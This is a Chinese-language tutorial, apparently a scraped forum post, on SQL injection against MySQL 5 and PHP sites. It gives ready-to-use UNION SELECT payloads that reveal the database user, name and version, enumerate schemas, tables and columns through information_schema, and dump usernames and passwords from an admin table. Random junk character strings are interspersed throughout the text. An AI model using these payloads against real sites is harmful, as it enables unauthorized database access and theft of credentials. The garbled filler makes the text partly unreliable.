; [, w c- V2 J: a7 r) R教程内容:Mysql 5+php 注入* B% l' ]" s% }6 n. Z
; ]% M: O+ N; m) J3 }8 g( E$ ~6 f& r$ Z' K
; {, m! Y0 `3 j
一.查看MYSQL基本信息(库名,版本,用户)- J7 O( Z4 s% B
1 i3 V6 z, c9 h8 _7 ^& I% [, b
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
' ]; a6 J( p0 o$ P; Y% M1 U, O& K0 u) d" B
二.查数据库; R' }3 x2 |* x/ S1 \* r; ^, b( }
: @5 @) \4 I* H2 G0 [4 Mand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
2 y$ P y" m/ u& f' @+ r- q; Plimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。" A. a6 O5 w6 n2 J+ T% S
% D7 q* h W0 ^+ j! l* m7 O3 e
三.暴表2 x0 z' C/ f' `8 G" w
+ ?# m. p2 a$ o( p" i& P4 ^and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
5 F) e2 I, y0 i n" O& I6 c' q( r1 G: J" _: l- o+ F
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。1 g: j2 h/ l8 q5 a7 @7 K( l
( M4 `% J4 t- @/ m- a
四.暴字段* o) G, L% C5 B1 L
3 k" @0 I- \) B+ b
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
& v; x! v, p: L& C8 O# y/ g- z( t+ c1 r) C: ]
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
9 K* N4 F: ?5 J" E& ?# n( ?2 r6 i) L5 |" g: ~
五.暴数据
$ d/ k" P0 X# q5 n" T7 k* z. B9 y9 j& k( L5 X
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*0 I9 _2 Q* N: y
. @, {7 t9 n" [ w9 L6 Z. X0 C
; z8 B9 }# `% C/ l8 C4 C这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
% Y4 C) E4 `( P- E |